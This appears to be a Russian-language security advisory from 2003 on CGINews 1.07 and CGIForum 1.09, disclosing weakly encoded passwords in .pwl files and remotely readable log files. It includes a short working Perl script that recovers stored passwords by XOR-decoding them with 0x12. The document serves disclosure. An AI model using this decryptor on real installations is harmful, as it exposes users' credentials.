Несколько уязвимостей в CGINews и CGIForum

Дата публикации:
17.12.2003
Всего просмотров:
855
Опасность:
Низкая
Наличие исправления:
Частично
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CGINews 1.x
CGIForum 1.x
Уязвимые версии: CGINews 1.07 и CGIForum 1.09

Описание: Уязвимость обнаружена в CGINews и CGIForum. Локальный пользователь может расшифровать пароли. Удаленный пользователь может просматривать журналы регистрации.

Пароли пользователей в *.pwl файлах закодированы слабым алгоритмом шифрования, который легко может быть взломан локальным пользователем.

Удаленный пользователь может читать лог файлы на сервере в конфигурации по умолчанию, используя следующий формат:

username/username.log

Пример/Эксплоит:

print "CGI News 1.07 - Pass Decrypt Utility \n";
print "------------------------------------ \n";
print "By JeiAr [ http://www.gulftech.org ] \n";

print "\n" x 3;

print "Please Enter Encrypted Pass:";

$UserPassword = <STDIN>;
chomp $UserPassword;

$UserPassword = EncDec($UserPassword);

print "\n" x 5;

print "Encrypted Pass Is: $UserPassword";

sub EncDec
{
	my @args = split //, shift();
	my $retval = '';
	for (my $stringpos = 0; $stringpos <= $#args; $stringpos++) {
		$retval .= chr(ord($args[$stringpos]) ^ 0x12);
	}
	return $retval;
}

exit;

URL производителя: http://triskam.virtualave.net/cginews.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Issues In CGINews and CGIForum

или введите имя

CAPTCHA